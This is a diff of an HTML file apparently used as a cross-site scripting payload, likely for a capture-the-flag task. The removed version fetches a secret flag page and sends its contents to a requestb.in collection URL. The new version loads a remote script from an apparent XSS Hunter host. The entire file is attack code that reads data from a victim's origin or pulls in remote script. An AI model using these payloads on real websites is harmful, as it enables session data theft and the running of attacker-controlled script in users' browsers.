--- a/xss1.html
+++ b/xss1.html
@@ -1,15 +1,5 @@
 <html>
 <body>
-<script>
-alert(document.domain);
-  setTimeout(function SOP_bypass() {
-    $.get('/secret/flag.php', function(data) {
-        // action with data
-        var image = new Image();
-        image.src='http://requestb.in/14tl3qr1?flag='+data;
-    });
-}, 1800000);
-
-</script>
+<script src=https://hrj.xss.ht></script>
 </body>
 </html>
